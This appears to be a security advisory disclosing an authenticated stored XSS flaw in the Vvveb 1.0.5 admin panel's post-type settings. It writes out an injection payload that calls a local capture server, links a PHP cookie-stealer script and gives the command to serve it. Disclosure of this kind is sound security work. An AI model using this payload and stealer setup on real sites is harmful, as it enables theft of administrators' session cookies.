Vvveb 1.0.5 | Authenticated site-wide silent XSS
Basic Information
| Software Type | Web App |
|---|---|
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | High |
| CVSS Score | 8.8 |
| Affected Assets | 100+ |
| Date of Discovery | Jan 3rd, 2025 |
Description
The endpoint at [/vadmin123/index.php?module=settings/post-types] is vulnerable to XSS. When a payload is applied here, it makes the whole site and every endpoint access through [/vadmin123/] vulnerable to attack.
This vulnerability can be exploited as long as you either a “Site Administraor”, “Administrator” or “Super Administrator”.
A well crafted XSS payload can be used to harvest cookies from multiple site admins, editors, vendors and everyone else.
Reproduce
Login as a moderator with “Site Administrator” role, open the following endpoint:
/vadmin123/index.php?module=settings/post-types
On top left, click on “Add type” button. From here you can add a post type, in [name="post_type[type]"] field you can enter a payload like the following:
"><img src='http://127.0.0.1:1718/capture.php'>
This payload will execute anytime anyone logs in through the admin panel [/vadmin123/], it executes malicious JavaScript used for stealing cookies silently.
To setup a cookie stealer server, you can save the following PHP script as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:
$ php -S 0.0.0.0:1718
Proof of Concept (PoC) Video
PoC Exploit
Mitigation
Patch
Posted on: January 10, 2025 11:28 PM